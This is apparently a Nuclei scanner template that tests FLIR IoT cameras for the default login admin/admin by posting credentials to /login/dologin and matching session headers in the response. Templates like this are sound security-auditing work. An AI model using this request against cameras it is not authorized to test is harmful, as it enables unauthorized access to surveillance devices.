id: flir-default-login

info:
  name: Flir Default Login
  author: pikpikcu
  severity: medium
  tags: default-login,flir,camera,iot

requests:
  - raw:
      - |
        POST /login/dologin HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        user_name={{username}}&user_password={{password}}

    payloads:
      username:
        - admin
      password:
        - admin
    attack: pitchfork

    matchers-condition: and
    matchers:

      - type: word
        words:
          - '"success"'

      - type: dsl
        dsl:
          - contains(tolower(all_headers), 'text/html')
          - contains(tolower(all_headers), 'phpsessid')
          - contains(tolower(all_headers), 'showcameraid')

        condition: and

      - type: status
        status:
          - 200
